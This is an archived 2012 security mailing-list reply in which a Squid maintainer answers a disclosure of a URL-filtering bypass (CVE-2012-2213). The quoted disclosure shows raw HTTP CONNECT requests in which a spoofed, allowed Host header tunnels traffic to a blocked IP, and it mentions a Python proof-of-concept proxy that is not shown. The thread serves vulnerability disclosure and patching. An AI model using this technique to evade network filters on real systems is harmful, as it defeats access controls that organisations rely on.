OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
Re: Squid URL Filtering Bypass

From: Amos Jeffries (amostreenet.co.nz)
Date: Fri Apr 20 2012 - 17:52:18 CDT


On 17/04/2012 10:11 a.m., Gabriel Menezes Nunes wrote:
> # Exploit Title: Squid URL Filtering Bypass
> # Date: 16/04/2012
> # Author: Gabriel Menezes Nunes
> # Version: Squid Proxy
> # Tested on: Squid Proxy 3.1.19
> # CVE: CVE-2012-2213
>
>
> I found a vulnerability in Squid Proxy that allows access to filtered sites.
> The software believes in the Host field of HTTP Header using CONNECT method.
> Example
>
> CONNECT 66.220.147.44:443 HTTP/1.1
> Host: www.facebook.com
>
>
> It is blocked.
>
> CONNECT 66.220.147.44:443 HTTP/1.1 (without host field)
>
> It is blocked.
>
> But:
>
> CONNECT 66.220.147.44:443 HTTP/1.1
> Host: www.uol.com.br (allowed url)
>
> The connection works.
>
> From here, I can send SSL traffic without a problem. This way, I can
> access any blocked site that allows SSL connections.
>
>
> This vulnerability is different from the CONNECT Tunnel method. The
> flaw is on the Host field processing. The software believes on this
> field.
>
> So, any sites can be accessed. URL filtering in this software is
> irrelevant and useless.
> One of the most important (if not the most important) feature of this
> kind of device is to protect the network in accessing specific URLs.
> So, this flaw is very dangerous, and it can be implemented even in
> malwares, bypassing any protection.
> I developed a python script that acts like a proxy and it uses this
> flaw to access any site.
> This tool is just a proof of concept.

Can you please email these details and the squid.conf used to find it to
the security bugs reporting address bugs at squid-cache.org.

This appears to be an aspect of same-origin bypass (CVE-2009-0801) or
something closely related.

Thank You
Amos Jeffries
Squid Software Foundation